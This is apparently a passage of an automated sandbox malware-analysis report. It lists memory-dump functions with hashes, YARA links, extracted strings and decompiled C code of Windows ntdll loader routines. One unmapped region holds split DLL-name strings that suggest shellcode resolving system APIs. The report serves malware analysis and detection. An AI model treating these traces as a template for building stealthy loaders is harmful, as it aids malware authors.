                                  • String ID:
                                  • API String ID: 3235210055-0
                                  • Opcode ID: 4c82a24debad3bd7cf5fb1f6cf7444a965baca2b33b79dfad6247e62b6ed3b5c
                                  • Instruction ID: 5d460b975fced50411c3e29b8d303b9f00787208a19b1b9d99265d05d4b19faf
                                  • Opcode Fuzzy Hash: 4c82a24debad3bd7cf5fb1f6cf7444a965baca2b33b79dfad6247e62b6ed3b5c
                                  • Instruction Fuzzy Hash: 34C0805C6003019DCE109D504CDD7F978117F10719F734CF59002DB351D652C4C6CC01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00082CEC, Relevance: 14.2, Strings: 11, Instructions: 444COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: f3e0b5516f0a347189b25e6c98bc0c13edf583cf6a14c2326c64618a5291d114
                                  • Instruction ID: 718178aefe961bb51f046a846ea2f6bd1605710326d63946e3499191fa7c85b2
                                  • Opcode Fuzzy Hash: f3e0b5516f0a347189b25e6c98bc0c13edf583cf6a14c2326c64618a5291d114
                                  • Instruction Fuzzy Hash: BEF16C70518F488FCBA4EF68C495BEAB7E1FB58300F404A2EA49FC7256DF30A5458B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00082CF2, Relevance: 14.2, Strings: 11, Instructions: 403COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: c755d9650584519df99eb319ef7fca55af0926ae1fa38034151d02ad8170f38c
                                  • Instruction ID: 8c52dc9e7bf1982eee0f91bb859c30ef2008ae6872a9bd9bb8c9c9dd0e430a1a
                                  • Opcode Fuzzy Hash: c755d9650584519df99eb319ef7fca55af0926ae1fa38034151d02ad8170f38c
                                  • Instruction Fuzzy Hash: 8EE14C74518F488FCBA4EF68C4957EAB7E1FB58300F904A2EA1DBC7256DF30A5418B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D8E00, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 126timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E1E3D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e49d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e498464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e495780 & 0x00000003) != 0) {
							E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e495780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E3EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e497984; // 0x772b68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e498464; // 0x75150110
					 *0x1e49b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E3D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e495780 & 0x00000005) != 0) {
						_push(_t49);
						E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                  0x1e3d8e0f
                                  0x1e3d8e16
                                  0x1e3d8e19
                                  0x1e3d8e1b
                                  0x1e3d8e21
                                  0x1e3d8e7f
                                  0x1e3d8e85
                                  0x1e419354
                                  0x1e41936c
                                  0x1e419371
                                  0x1e41937b
                                  0x1e419381
                                  0x1e419381
                                  0x1e41937b
                                  0x1e3d8e9d
                                  0x1e3d8e9d
                                  0x1e3d8e29
                                  0x1e3d8e2c
                                  0x1e3d8e38
                                  0x1e3d8e3e
                                  0x1e3d8e43
                                  0x1e3d8eb5
                                  0x1e3d8eb9
                                  0x1e4192aa
                                  0x1e4192af
                                  0x1e4192e8
                                  0x1e4192e8
                                  0x1e4192af
                                  0x1e3d8eb9
                                  0x1e3d8e45
                                  0x1e3d8e53
                                  0x1e3d8e5b
                                  0x1e3d8e5f
                                  0x1e3d8e78
                                  0x1e3d8e78
                                  0x1e3d8e7d
                                  0x1e3d8ec3
                                  0x1e3d8ecd
                                  0x1e3d8ed2
                                  0x1e3d8ed2
                                  0x1e3d8ec5
                                  0x1e3d8ec5
                                  0x00000000
                                  0x1e3d8e7d
                                  0x1e3d8e67
                                  0x1e3d8ea4
                                  0x1e41931a
                                  0x00000000
                                  0x00000000
                                  0x1e419320
                                  0x1e3d8ea4
                                  0x1e3d8e70
                                  0x1e419325
                                  0x1e419340
                                  0x1e419345
                                  0x1e419345
                                  0x1e3d8e76
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  Strings
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E41932A
                                  • h+w, xrefs: 1E3D8E2C
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 1E41933B, 1E419367
                                  • LdrpFindDllActivationContext, xrefs: 1E419331, 1E41935D
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 1E419357
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h+w$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-1608259671
                                  • Opcode ID: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
                                  • Instruction ID: e0526d5ec8df3a5b9409c9e9e0638c28807f8fa09bbff3364ffb9be08153f0c8
                                  • Opcode Fuzzy Hash: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
                                  • Instruction Fuzzy Hash: 4C414A33D003569FDB14AB19CC98A69F2BEBB84204F86476AE90D67150E770FD888FD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3BD5E0, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 353timeCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E1E3BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1e49d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1E3B6600(0x1e4952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1e497b9c; // 0x0
							_t281 = L1E3C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1E3EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1e497b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x1e497b8c; // 0x772a80
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E1E3C2280(_t200, 0x1e4984d8);
									_t277 =  *0x1e4985f4; // 0x772f70
									_t351 =  *0x1e4985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x772f08
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1E3BFFB0(_t287, _t353, 0x1e4984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1E3FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1E3B6600(0x1e4952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1E3B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1e49b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1E42E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1e498472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1e49b218; // 0x0
														asm("ror edi, cl");
														 *0x1e49b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1E3C2280(_t250, 0x1e4984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1E3E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1E3BFFB0(_t293, _t353, 0x1e4984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1E3E37F5(_t353, 0);
																}
																E1E3E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1E3D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1E3D02D6(_t174);
																}
																L1E3C77F0( *0x1e497b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1E3DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1E3BEC7F(_t353);
										L1E3D19B8(_t287, 0, _t353, 0);
										_t200 = E1E3AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1E3EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1e49b2f8; // 0x0
									if((_t206 |  *0x1e49b2fc) == 0 || ( *0x1e49b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1e49b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1E456B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1E456AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1E3BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1E3BEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1E3E9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1E3BE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1E3B8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1E3E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                  0x1e3bd5f2
                                  0x1e3bd5f5
                                  0x1e3bd5f5
                                  0x1e3bd5fd
                                  0x1e3bd600
                                  0x1e3bd60a
                                  0x1e3bd60d
                                  0x1e3bd617
                                  0x1e3bd61d
                                  0x1e3bd627
                                  0x1e3bd62e
                                  0x1e3bd911
                                  0x1e3bd913
                                  0x00000000
                                  0x1e3bd919
                                  0x1e3bd919
                                  0x1e3bd919
                                  0x1e3bd634
                                  0x1e3bd634
                                  0x1e3bd634
                                  0x1e3bd634
                                  0x1e3bd640
                                  0x1e3bd8bf
                                  0x00000000
                                  0x1e3bd646
                                  0x1e3bd646
                                  0x1e3bd64d
                                  0x1e3bd652
                                  0x1e40b2fc
                                  0x1e40b2fc
                                  0x1e40b302
                                  0x1e40b33b
                                  0x1e40b341
                                  0x00000000
                                  0x1e40b304
                                  0x1e40b304
                                  0x1e40b319
                                  0x1e40b31e
                                  0x1e40b324
                                  0x1e40b326
                                  0x1e40b332
                                  0x1e40b347
                                  0x1e40b34c
                                  0x1e40b351
                                  0x1e40b35a
                                  0x00000000
                                  0x1e40b328
                                  0x1e40b328
                                  0x00000000
                                  0x1e40b328
                                  0x1e40b326
                                  0x1e3bd658
                                  0x1e3bd658
                                  0x1e3bd65b
                                  0x1e3bd665
                                  0x00000000
                                  0x1e3bd66b
                                  0x1e3bd66b
                                  0x1e3bd66b
                                  0x1e3bd66b
                                  0x1e3bd66d
                                  0x1e3bd672
                                  0x1e3bd67a
                                  0x00000000
                                  0x00000000
                                  0x1e3bd680
                                  0x1e3bd686
                                  0x1e3bd8ce
                                  0x1e3bd8d4
                                  0x1e3bd8dd
                                  0x1e3bd8e0
                                  0x1e3bd68c
                                  0x1e3bd691
                                  0x1e3bd69d
                                  0x1e3bd6a2
                                  0x1e3bd6a7
                                  0x1e3bd6b0
                                  0x1e3bd6b5
                                  0x1e3bd6e0
                                  0x1e3bd6b7
                                  0x1e3bd6b7
                                  0x1e3bd6b9
                                  0x1e3bd6b9
                                  0x1e3bd6bb
                                  0x1e3bd6bd
                                  0x1e3bd6ce
                                  0x1e3bd6d0
                                  0x1e3bd6d2
                                  0x1e40b363
                                  0x1e40b365
                                  0x00000000
                                  0x1e40b36b
                                  0x00000000
                                  0x1e40b36b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3bd6bf
                                  0x1e3bd6bf
                                  0x1e3bd6e5
                                  0x1e3bd6e7
                                  0x1e3bd6e9
                                  0x1e3bd6ec
                                  0x1e3bd6ec
                                  0x1e3bd6ef
                                  0x1e3bd6f5
                                  0x1e3bd6f9
                                  0x1e3bd6fb
                                  0x1e3bd6fd
                                  0x1e3bd701
                                  0x1e3bd703
                                  0x1e3bd70a
                                  0x1e3bd70a
                                  0x1e3bd701
                                  0x1e3bd710
                                  0x1e3bd710
                                  0x1e3bd6c1
                                  0x1e3bd6c1
                                  0x1e3bd6c6
                                  0x1e40b36d
                                  0x1e40b36f
                                  0x00000000
                                  0x1e40b375
                                  0x1e40b375
                                  0x1e40b375
                                  0x00000000
                                  0x1e40b375
                                  0x00000000
                                  0x1e3bd6cc
                                  0x1e3bd6d8
                                  0x1e3bd6d8
                                  0x1e3bd6d8
                                  0x00000000
                                  0x1e3bd6c6
                                  0x1e3bd6bf
                                  0x00000000
                                  0x1e3bd6da
                                  0x1e3bd6da
                                  0x1e3bd716
                                  0x1e3bd71b
                                  0x1e3bd720
                                  0x1e3bd726
                                  0x1e3bd726
                                  0x1e3bd72d
                                  0x00000000
                                  0x1e3bd733
                                  0x1e3bd739
                                  0x1e3bd742
                                  0x1e3bd750
                                  0x1e3bd758
                                  0x1e3bd764
                                  0x1e3bd776
                                  0x1e3bd77a
                                  0x1e3bd783
                                  0x1e3bd928
                                  0x1e3bd92c
                                  0x1e3bd93d
                                  0x1e3bd944
                                  0x1e3bd94f
                                  0x1e3bd954
                                  0x1e3bd956
                                  0x1e3bd95f
                                  0x1e3bd961
                                  0x1e3bd973
                                  0x1e3bd973
                                  0x1e3bd956
                                  0x1e3bd944
                                  0x1e3bd92c
                                  0x1e3bd78b
                                  0x1e40b394
                                  0x1e3bd791
                                  0x1e3bd798
                                  0x1e40b3a3
                                  0x1e40b3bb
                                  0x1e40b3bb
                                  0x1e3bd7a5
                                  0x1e3bd866
                                  0x1e3bd870
                                  0x1e3bd884
                                  0x1e3bd892
                                  0x1e3bd898
                                  0x1e3bd89e
                                  0x1e3bd8a0
                                  0x1e3bd8a6
